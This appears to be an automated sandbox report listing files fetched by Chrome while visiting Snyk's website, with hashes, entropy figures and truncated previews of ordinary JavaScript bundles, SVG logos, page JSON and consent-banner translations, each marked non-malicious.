                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):114356
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.368083594446959
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:5BP+8QgAwxB32Zqmsl9L0ZpsYsy/NwoihDWEASLM2fCMEY:5pXxBrLQZ//NjihDaSLM0hEY
                                                                                                                                                                                                                                                                                                              MD5:766DBCDF4793CC32BB4726CE1A4EEB42
                                                                                                                                                                                                                                                                                                              SHA1:1F40BB2F204C25729077DAD62316B27A9DA6F5C3
                                                                                                                                                                                                                                                                                                              SHA-256:0C411DA85C8E2C06C45F78DFE0FAED5FC9B6CE1FFA45EA909FC564FCBF48FB97
                                                                                                                                                                                                                                                                                                              SHA-512:0DEFE29585EBDDD5482C62B0D6A244FE0B6A9079EC1BD2A8D112879CDC75CE47E9514DF5709E4D3854029F1E48007C4715ECF75FBFDF8B38ED15EAE71C25A1CE
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[179],{84878:function(e,t){"use strict";function r(){return""}Object.defineProperty(t,"__esModule",{value:!0}),Object.defineProperty(t,"getDeploymentIdQueryOrEmptyString",{enumerable:!0,get:function(){return r}})},40037:function(){"trimStart"in String.prototype||(String.prototype.trimStart=String.prototype.trimLeft),"trimEnd"in String.prototype||(String.prototype.trimEnd=String.prototype.trimRight),"description"in Symbol.prototype||Object.defineProperty(Symbol.prototype,"description",{configurable:!0,get:function(){var e=/\((.*)\)/.exec(this.toString());return e?e[1]:void 0}}),Array.prototype.flat||(Array.prototype.flat=function(e,t){return t=this.concat.apply([],this),e>1&&t.some(Array.isArray)?t.flat(e-1):t},Array.prototype.flatMap=function(e,t){return this.map(e,t).flat()}),Promise.prototype.finally||(Promise.prototype.finally=function(e){if("function"!=typeof e)return this.then(e,e);var t=this.constructor||Promise;return this.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):2907
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.751797784282422
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:2PGLUHQfoL98Ux43g5yk02Fv1gv7q2FvCCx0guFK3u498:mGLUwfzF0yugvu61uQ3u46
                                                                                                                                                                                                                                                                                                              MD5:2339CBE32EE9F36E5DDA6C9F14F54044
                                                                                                                                                                                                                                                                                                              SHA1:2B14105CD6CF5296D79C28EBCCE815B493568867
                                                                                                                                                                                                                                                                                                              SHA-256:C449CD497A6CCF0092A7E90F14689FCE6F9B0FE1AF917A5414D04F2D4561415F
                                                                                                                                                                                                                                                                                                              SHA-512:93C819A391EEA239E8DDA3FDE0BB473620E3522F0DD6033224FF4E7DF79EE3462840F67BEEE242041A07F21E40B724B683BA6FB2DFCC908BA80BA0637CED8235
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://res.cloudinary.com/snyk/image/upload/v1616767498/wordpress-sync/logo-atlassian.svg
                                                                                                                                                                                                                                                                                                              Preview:<svg viewBox="0 0 121 15.01" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><clipPath id="a" transform="translate(-236.67 -413.68)"><path d="m236.67 413.68h121v15.01h-121z"/></clipPath><linearGradient id="b" gradientTransform="matrix(1 0 0 -1 -8.36 867.06)" gradientUnits="userSpaceOnUse" x1="251.43" x2="247.59" y1="445.41" y2="438.76"><stop offset="0" stop-color="#2a56a3"/><stop offset=".92" stop-color="#4577bb"/></linearGradient><g clip-path="url(#a)"><path d="m241.07 420.53a.42.42 0 0 0 -.38-.16.39.39 0 0 0 -.2.08.36.36 0 0 0 -.14.16l-3.63 7.27a.42.42 0 0 0 -.05.22.56.56 0 0 0 .06.21.57.57 0 0 0 .16.15.54.54 0 0 0 .21.05h5.07a.46.46 0 0 0 .23-.06.4.4 0 0 0 .16-.18 7.47 7.47 0 0 0 -1.49-7.74z" fill="url(#b)" transform="translate(-236.67 -413.68)"/><path d="m243.74 413.92a9.61 9.61 0 0 0 -.56 9.47l2.44 4.88a.41.41 0 0 0 .39.24h5.06a.54.54 0 0 0 .22-.05.54.54 0 0 0 .15-.15.58.58 0 0 0 .07-.21.42.42 0 0 0 0-.22l-7-14a.57.57 0 0 0 -.15-.16.47.47 0 0 0 -.22-.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):56
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.9983733344003465
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:YJELTrzaEIGWZMREHJxr/4AL1:YQTiE3gRHD
                                                                                                                                                                                                                                                                                                              MD5:FCF6C185DD87C3BB654FDCC1368EF6AE
                                                                                                                                                                                                                                                                                                              SHA1:6C6811600CA6A3B4A2C4B9ED64A772503605E6DF
                                                                                                                                                                                                                                                                                                              SHA-256:A75D094CABA33AC05120819A5FD16B225BCD6CEDA6D4B507D6DAC56D3BBD4320
                                                                                                                                                                                                                                                                                                              SHA-512:8AEB96C48D2FDB416678102338D2C227457AFFFCEEF6640DA256C37AD43DF82B975EB540940D5083676D3D2961A962FAB6ECBA2F163439177005B97926C5F541
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://api.usercentrics.eu/settings/Zz23KCbJ4/latest/languages.json
                                                                                                                                                                                                                                                                                                              Preview:{"languagesAvailable":["en"],"editableLanguages":["en"]}
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (17065), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):17065
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.1089101567430735
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:FtDuCrl6xOIVoCM6qbSjbCMTYozln0/s4MXcK/qtQCZ69CmC4yVs:FtDuCrl6x1OCM1SjbCMTYoz10/s4mcKF
                                                                                                                                                                                                                                                                                                              MD5:E28EBC3391B56E8F01EA063DC089E9D3
                                                                                                                                                                                                                                                                                                              SHA1:D0EB0EDDB70199DB3533F492E7F2E22BE890A1FA
                                                                                                                                                                                                                                                                                                              SHA-256:AFBD41E7209FA3AEF6F53C7A5713AA542A7BE54C432FEC2D690E0DFACCD528D1
                                                                                                                                                                                                                                                                                                              SHA-512:A2ED47575F06F20F3C53845F527E5CEF910A85AAB2CC8F07EFD761239C2255920A154CDF432E170207BE23841458D22BFA96C47CD4ECA590BC71A948B8F98F46
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[19],{"1J7a":function(t,e){t.exports=function _arrayWithHoles(t){if(Array.isArray(t))return t}},"2jbg":function(t,e,r){"use strict";function _setPrototypeOf(t,e){return(_setPrototypeOf=Object.setPrototypeOf||function _setPrototypeOf(t,e){return t.__proto__=e,t})(t,e)}r.d(e,"a",function(){return _setPrototypeOf})},"4+fu":function(t,e,r){"use strict";function _assertThisInitialized(t){if(void 0===t)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return t}r.d(e,"a",function(){return _assertThisInitialized})},"5aO3":function(t,e,r){"use strict";function _arrayLikeToArray(t,e){(null==e||e>t.length)&&(e=t.length);for(var r=0,n=new Array(e);r<e;r++)n[r]=t[r];return n}r.d(e,"a",function(){return _arrayLikeToArray})},"7Ru6":function(t,e){t.exports=function _nonIterableRest(){throw new TypeError("Invalid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [S
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):1864
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.794350810511464
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:YmTHeJUS31HEr3US+10Z8YlVD11Wux6MMUxWBPWg1bnNM07zAd:tTq9S+10Z7f+Cx4Pxxnq07zu
                                                                                                                                                                                                                                                                                                              MD5:417193CFD271203B703B3E07DB480320
                                                                                                                                                                                                                                                                                                              SHA1:F8DBE0C4A35A00E76195F2DB90A20A17F69C0E00
                                                                                                                                                                                                                                                                                                              SHA-256:FE2F4B1EA23905DDF0CD841EF1FEF257138151C9DB5A78B451F182FDF0AC66AD
                                                                                                                                                                                                                                                                                                              SHA-512:87BC4591EE2D2F90B92C4B4FEF0E61297C7FB892F5F17FC3CE104058B859D50E8873008ECEAF2BBDCD413DBDBF645C46B51B56399BBEDAA22F047C4DAE2CA7CC
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:<svg fill="none" viewBox="0 0 64 64" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><linearGradient id="a" gradientUnits="userSpaceOnUse" x1="11.7808" x2="69.169" y1="3.99999" y2="17.4721"><stop offset="0" stop-color="#9043c6"/><stop offset="1" stop-color="#145deb"/></linearGradient><linearGradient id="b" gradientUnits="userSpaceOnUse" x1="30.9085" x2="72.2647" y1="20.8475" y2="30.964"><stop offset="0" stop-color="#f99048"/><stop offset="1" stop-color="#e555ac"/></linearGradient><g clip-rule="evenodd" fill-rule="evenodd"><path d="m28.1091 60.3503c.1246.0178.2511.0178.3757 0 .1247.0178.2512.0178.3758 0 1.3819-.4656 2.6991-.9733 3.9523-1.5241l-7.9703-4.6256c-1.1294-.657-1.8426-1.8728-1.8426-3.2022v-17.173c0-1.2021.5502-2.2165 1.3728-2.8787-.2711-1.46.3159-3.0604 1.7944-3.9215l.0046-.0027 14.5031-8.4124.4532-.2619c1.1554-.6676 2.5832-.6676 3.7386 0l.4575.2644 6.6443 3.854v-10.2027c.0118-.2587-.0624-.5141-.2111-.7262-.1486-.2122-.3634-.3692-.6109-.4466l-22.30
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65513), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):87495
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.096192842839349
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:4woYclr6p9XjyT3vHsvZvjdR6Pta9IboltYTeu0/kikEMVvpxl+fm9re9PE8waMe:NWup1yT3sT9bltYTeu0/ki4Xr9faMe
                                                                                                                                                                                                                                                                                                              MD5:F848AF443814368E0D91BE08E938EAEF
                                                                                                                                                                                                                                                                                                              SHA1:4116DABAB93767261819B97B37E4227670BD577F
                                                                                                                                                                                                                                                                                                              SHA-256:E1807216B2C520B419B6F3E1B6EA84D463BCC23E869E4FC2E54F51AE197C5948
                                                                                                                                                                                                                                                                                                              SHA-512:C656202A3B4D10D9D461099CBC8C9C6076836EE72D25883D45F94741210DBAB456A3892350808C0DF7146608805D6E84C3BECFBC1549CCFAC87EBC8D810224DB
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"6OeonPIxF0eJJEqXeb7e4l","type":"Entry","createdAt":"2022-10-20T15:39:10.099Z","updatedAt":"2024-05-01T11:45:06.864Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":56,"revision":10,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"templateDefault"}},"locale":"en-US"},"fields":{"internalName":"Products - Snyk Container","title":"Container vulnerability management & Kubernetes workload security | Snyk","slug":"container-vulnerability-management","uri":"product/container-vulnerability-management","pageLocalization":["de","ja","fr","pt-BR"],"contentTags":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"NfI2TnwVAmXHhiC3XkyHM","type":"Entry","createdAt":"2022-10-20T15:39:10.225Z","updatedAt":"2023-06-07T16:59:28.06
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (5358), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):5358
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.15794501559416
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:z6ALCF6wluWf/FwmqoFQvheRJzh3L+tl/HfEjyBphE:nO1oA/amqqQvERRh3wxfEjwpe
                                                                                                                                                                                                                                                                                                              MD5:10A12F623813AABD1075D8A47B163938
                                                                                                                                                                                                                                                                                                              SHA1:FAC20E8DBC5BB8CD708336AB512775CD8F3A7E1D
                                                                                                                                                                                                                                                                                                              SHA-256:249AECBC75DEE49C57BD16D643E273DA5110B4020BA80C4A2209A24D258E77D5
                                                                                                                                                                                                                                                                                                              SHA-512:B4CFD3F603FE9955C2266B7881784BE7400624ACB0E1BB00EC21A341C6B59A6DBD90F3505397EA1E420C3DF4B3A0E583FA072061813CB5D6355CCB051CEDABB5
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1751],{81751:function(i,l,o){o.r(l),o.d(l,{default:function(){return I}});var d=o(85893),n=o(45697),e=o.n(n),v=o(96098),t=o(15020);function u(i){let{section:l,colorScheme:o,children:n=[]}=i;return(0,d.jsx)(v.Z,{...l,colorScheme:o,"data-component":"River Layout",children:(0,d.jsx)("div",{className:"d-flex flex-col gap-huge",children:n})})}u.propTypes={section:e().shape(v.Z.propTypes),children:e().arrayOf(e().element),colorScheme:e().oneOf(t.z7)};var r=o(5152),s=o.n(r),a=o(9981),c=o(23751);let p=s()(()=>o.e(3886).then(o.bind(o,83886)),{loadableGenerated:{webpack:()=>[83886]}}),f=s()(()=>Promise.all([o.e(5030),o.e(6936)]).then(o.bind(o,16936)),{loadableGenerated:{webpack:()=>[16936]}}),h=s()(()=>Promise.all([o.e(4098),o.e(169)]).then(o.bind(o,10169)),{loadableGenerated:{webpack:()=>[10169]}});function y(i){var l,o,n,e,v,t;let{component:u,settings:r}=i,s=(0,c.bU)(),{sys:y,fields:b}=u,m={moleculeTextFeatureGrid:p,molecule
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (3442), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):3442
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.2351556107667045
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:ibMBAdqAORuJ/OpV4jijjU4yuT0R0GR0BOsj24CMJPPG7Fy4:p1buwQ0GR0myJGy4
                                                                                                                                                                                                                                                                                                              MD5:7ABCA888C0D57AB9671D55BE3B5C4AF4
                                                                                                                                                                                                                                                                                                              SHA1:674A249661099771C3BC4989B536D22CA4EA56FE
                                                                                                                                                                                                                                                                                                              SHA-256:9E272AA1275AE85EA34C711FF9B49D34B0CFA0EF40A470EB6A35767E3DB0D248
                                                                                                                                                                                                                                                                                                              SHA-512:B6B40CC2C508B55BF9D8EA3E1972B5A71566C759CA309AECD59E54C341E5C66D533BAB8407D6C5B635475BD72941A9818508A2F44DEF961FC24A55AD9427B0D3
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[8315],{73359:function(l,n,i){i.d(n,{Z:function(){return u}});var e=i(85893),o=i(45697),a=i.n(o),s=i(44133);function d(l){let{label:n,className:i}=l;return(0,e.jsx)("span",{className:(0,s.Z)("badge",i),"data-component":"Badge",children:n})}d.propTypes={label:a().string,type:a().string,className:a().string};var u=d},58315:function(l,n,i){i.r(n),i.d(n,{default:function(){return x}});var e=i(85893),o=i(45697),a=i.n(o),s=i(24982),d=i(73359),u=i(44133),t=i(6215),c=i(15020),r=i(46275),v=i(52752);function m(l){var n;let{label:i,description:o,url:a,icon:c,badge:r,colorScheme:v,spotlight:m}=l;return(0,e.jsx)("li",{className:"submenu-nav-item","data-component":"Sub Menu Item",children:(0,e.jsxs)(s.Z,{href:a,className:(0,u.Z)("submenu-link",m&&"spotlight"),trackingLabel:"cta_click_main_nav",trackingProps:{cta_location:"Header"},children:[c&&(0,e.jsx)("i",{className:(0,u.Z)("general-icon","icon-".concat(c))}),(0,e.jsxs)("div",{cl
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):1906
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.3872195802319025
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:c74EPofTvGoVqEQEV1L85T8rH/go6z3PyOV:rVfzVqE385T0UPb
                                                                                                                                                                                                                                                                                                              MD5:E99543BB86794E15928D03E9B41BB3C8
                                                                                                                                                                                                                                                                                                              SHA1:66938EAAA4FF7C21EE6B7C3C5FEFBC004EE6D7C9
                                                                                                                                                                                                                                                                                                              SHA-256:A33A47A20C0EC6B0C13AF43AE681BF73023E4A35F792CB055700E94D467F236D
                                                                                                                                                                                                                                                                                                              SHA-512:E8D0B37870343E0C4CF521459EBC2DE473EC553CBA13F9C7727C361959833A262E6C251718656950AD8D1BC372C168E570C505AA816F8CD11A677A175ACC2126
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="no"?>.<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 272 92" width="272" height="92"><path fill="#EA4335" d="M115.75 47.18c0 12.77-9.99 22.18-22.25 22.18s-22.25-9.41-22.25-22.18C71.25 34.32 81.24 25 93.5 25s22.25 9.32 22.25 22.18zm-9.74 0c0-7.98-5.79-13.44-12.51-13.44S80.99 39.2 80.99 47.18c0 7.9 5.79 13.44 12.51 13.44s12.51-5.55 12.51-13.44z"/><path fill="#FBBC05" d="M163.75 47.18c0 12.77-9.99 22.18-22.25 22.18s-22.25-9.41-22.25-22.18c0-12.85 9.99-22.18 22.25-22.18s22.25 9.32 22.25 22.18zm-9.74 0c0-7.98-5.79-13.44-12.51-13.44s-12.51 5.46-12.51 13.44c0 7.9 5.79 13.44 12.51 13.44s12.51-5.55 12.51-13.44z"/><path fill="#4285F4" d="M209.75 26.34v39.82c0 16.38-9.66 23.07-21.08 23.07-10.75 0-17.22-7.19-19.66-13.07l8.48-3.53c1.51 3.61 5.21 7.87 11.17 7.87 7.31 0 11.84-4.51 11.84-13v-3.19h-.34c-2.18 2.69-6.38 5.04-11.68 5.04-11.09 0-21.25-9.66-21.25-22.09 0-12.52 10.16-22.26 21.25-22.26 5.29 0 9.49 2.35 11.68 4.96h.34v-3.61h9.25zm-8.56 20.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):3776
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.364643034622523
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:tTpKtkKtKF3ruWSd+GlD4ajyI9SLNWvrA72Jk0jQ2YnS:y+F7HG+fNsk2wS
                                                                                                                                                                                                                                                                                                              MD5:2284E4346A80A07B1D571B8459ECD409
                                                                                                                                                                                                                                                                                                              SHA1:C2BD79A18FD90E6416D3C0BD2E0B3A453899E878
                                                                                                                                                                                                                                                                                                              SHA-256:DDDFE47CF4CE77DC6DAC768A6AF004C591E4308350273D2B7BCD393C7BF47671
                                                                                                                                                                                                                                                                                                              SHA-512:082319B004EDB5F19894892B50535571C0CD475C70F270E280FC3F23EC3E25EC5DF6C9BC3EF068CC84E6D68C0DE7D640DF9E819C9A88B052EF91FA3E39EBCB52
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://res.cloudinary.com/snyk/image/upload/snyk-mktg-brandui/brand-icons/admin.svg
                                                                                                                                                                                                                                                                                                              Preview:<svg fill="none" viewBox="0 0 64 64" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><linearGradient id="a" gradientUnits="userSpaceOnUse" x1="0" x2="57.0839" y1="0" y2="54.8724"><stop offset="0" stop-color="#9043c6"/><stop offset="1" stop-color="#0a26b8"/></linearGradient><linearGradient id="b" gradientUnits="userSpaceOnUse" x1="56" x2="12.5237" y1="56" y2="25.9134"><stop offset="0" stop-color="#e555ac"/><stop offset="1" stop-color="#f99048"/></linearGradient><path clip-rule="evenodd" d="m47.3704 18.5808.952 2.3072c7.6776 2.7944 7.6776 3.1192 7.6776 4.0432v5.8688c0 .9184 0 1.2376-7.644 4.284l-.9464 2.3016c.2127.4577.4114.8878.5967 1.2924-1.0401-1.0368-2.0845-2.0765-3.1287-3.1085-.8716-.861-1.738-1.7133-2.6018-2.5631-1.289-1.268-2.5722-2.5303-3.8585-3.8075l-.0243-.0241-.0249-.0237c-.1973-.1871-.3447-.4123-.4348-.6562-.0901-.2438-.1218-.5027-.0941-.758l.0185-.1699-.0009-.1709c-.0003-.0517.0032-.1034.0103-.1548l.0187-.1341.0065-.1353c.0363-.7519.0072-1.5055-
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):7457
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.34297521532081
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:7iDQ7e1rjU7t+K4K8caBIsKcML42CRNcookG2SXTTev5:7roKlX3eSXTTeR
                                                                                                                                                                                                                                                                                                              MD5:E1FBAB4A7A2F1F4DB9C23112004E958A
                                                                                                                                                                                                                                                                                                              SHA1:DFC4F8DBFDFC8E3AFF41881145D7BABD2C914B9B
                                                                                                                                                                                                                                                                                                              SHA-256:293C213205CD107EC18A50AE1F8A7B79915117D162CC58701A575DEF7C295D39
                                                                                                                                                                                                                                                                                                              SHA-512:D97D5F13D61BDAB589DE2734DA87D603C3C8540D3EB2C9D8A98DA56093DA2E9CAFEFF55997335946F8A15AA5C26367D34AAC11ED3626D7998E0EFB704AB993E3
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://api.usercentrics.eu/translations/translations-en.json
                                                                                                                                                                                                                                                                                                              Preview:{"labels":{"ALL":"All","BACK":"Back","CID_TITLE":"ID to request consent data","CNIL_DENY_LINK_TEXT":"Continue without accepting","COOKIE_REFRESH":"Cookie refresh","COOKIE_STORAGE":"Cookie storage","DETAILS":"Details","LANGUAGE_TOOLTIP":"Changes occur immediately after selection.","MOBILE_TCF_MAX_STORAGE_DURATION_TEXT":"The choices you make regarding the purposes and entities listed are saved in the local storage","MOBILE_TCF_MAX_STORAGE_DURATION_TITLE":"CMP Maximum Storage Duration","SUB_SERVICE":"Subservice","SUB_SERVICES":"Subservices","SUB_SERVICES_DESCRIPTION":"Below you can find all the services that are subordinate to this service. The current consent status of this service applies to all subservices.","THIRD_COUNTRY_TRANSFER":"Data Transfer to Third Countries","VENDORS_OUTSIDE_EU":"This vendor is transferring data outside the EU / EEA.","WEB_TCF_MAX_STORAGE_DURATION_TEXT":"The choices you make regarding the purposes and entities listed are saved in the local storage","WEB_TCF_MA
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65363), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):116419
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.104249038958241
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:768:uehJCAMeun4r5AZOhgaTxY2aTxZJTaTx+haTxU60uaTxs+DNmzmsxIBHcnMPFcZV:uezC4ri4lTxYTx2TxFTxX0lTxXNq5mE
                                                                                                                                                                                                                                                                                                              MD5:2DF4DD9BC4CFB98F33E7147005388C78
                                                                                                                                                                                                                                                                                                              SHA1:132D494301B6527579E7D0B0534A424E71A92A40
                                                                                                                                                                                                                                                                                                              SHA-256:3869540078D029704027E27CF5B96C8D0BB7EC397CE55F9AB02A1F9A6B4D30E2
                                                                                                                                                                                                                                                                                                              SHA-512:6B8964A06F9DB8C9C5AD3C6835A766A58311C56A6AFF7A7028BEE194EE22715D79A9F0AA3A9EC43EC52C8E99D5BEAE23219D5C0EFDE6BC09A9715A8D9FB3EC29
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"2tf23U3O0doS4ECgx7AkmD","type":"Entry","createdAt":"2022-10-21T23:25:33.197Z","updatedAt":"2024-03-01T12:51:39.212Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":35,"revision":8,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"templateDefault"}},"locale":"en-US"},"fields":{"internalName":"About Snyk","title":"About Snyk | Snyk","slug":"about","uri":"about","pageLocalization":["de","fr","ja","pt-BR"],"seoSocialSharing":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"2v38cejyFbtdTbB4trHoAZ","type":"Entry","createdAt":"2022-10-21T23:25:33.316Z","updatedAt":"2023-09-21T23:18:05.073Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":39,"revision":10,"contentType":
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:JPEG image data, progressive, precision 8, 1447x847, components 3
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):18687
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.834094503114285
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:lzNVDNgTmAy53quE7OplC6NQVPQy5IWZ/H7w+SFMQ7CMMCLXA+p:lzPDNJAyJVE7Ol9+VPQy5IWZ/k+FQXQ6
                                                                                                                                                                                                                                                                                                              MD5:4C3304A804CCC2123620BB7E2948608E
                                                                                                                                                                                                                                                                                                              SHA1:60DD666F13213061E13C081E749C880AECE37179
                                                                                                                                                                                                                                                                                                              SHA-256:5E8879B0588DD5F51A561220B25AA801B90C09075D3ECCA87419599377ADBF31
                                                                                                                                                                                                                                                                                                              SHA-512:DD59796EE6A7339D9B1DB23ACC6EAA12D645421950F2F683C36FB5BDEA46F1A1ED2EA55B1DC9AE253B67350B79FAD7EBFE460E02AEBBEF4AEDC69C222E95C37B
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
